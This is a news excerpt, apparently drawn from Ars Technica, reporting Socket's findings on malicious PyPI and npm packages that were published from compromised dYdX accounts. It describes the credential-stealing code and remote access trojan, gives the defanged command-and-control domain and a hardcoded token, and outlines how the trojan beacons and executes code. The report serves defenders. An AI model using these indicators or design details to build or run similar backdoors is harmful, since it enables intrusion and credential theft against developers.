"The malicious code available on PyPI contained the same credential theft function, although it also implemented a remote access Trojan (RAT) that allowed the execution of new malware on infected systems. The backdoor received commands from dydx[.]priceoracle[.]site. The domain was registered on January 9, 17 days before the malicious package was uploaded to PyPI."
"The RAT, Socket said: Runs as a background daemon thread Beacons to the C2 server every 10 seconds Receives Python code from the server Executes it in an isolated subprocess with no visible output Uses a hardcoded authorization token: 490CD9DAD3FAE1F59521C27A96B32F5D677DD41BF1F706A0BF85E69CA6EBFE75 Once installed, the threat actors could: Execute arbitrary Python code with user privileges Steal SSH keys, API credentials, and source code Install persistent backdoors Exfiltrate sensitive files Monitor user activity Modify critical files Pivot to other systems on the network"
""Viewed alongside the 2022 npm supply chain compromise and the 2024 DNS hijacking incident, this [latest] attack highlights a persistent pattern of adversaries targeting dYdX-related assets through trusted distribution channels," Socket said. "The threat actor simultaneously compromised packages in both npm and PyPI ecosystems, expanding the attack surface to reach JavaScript and Python developers working with dYdX.""
Malicious packages published to PyPI and npm included credential-stealing code and a remote access Trojan that received commands from dydx[.]priceoracle[.]site. The control domain was registered on January 9, 17 days before the PyPI upload. The RAT runs as a background daemon, beacons to its C2 every 10 seconds, receives Python code, executes it in an isolated subprocess with no visible output, and uses a hardcoded authorization token. Operators gaining access can execute arbitrary Python, steal SSH keys and API credentials, install backdoors, exfiltrate files, monitor activity, modify critical files, and pivot across networks. The packages were published from official dYdX accounts, indicating account compromise and an expanded attack surface affecting JavaScript and Python developers.
Read at Ars Technica
Unable to calculate read time
Collection
[
|
...
]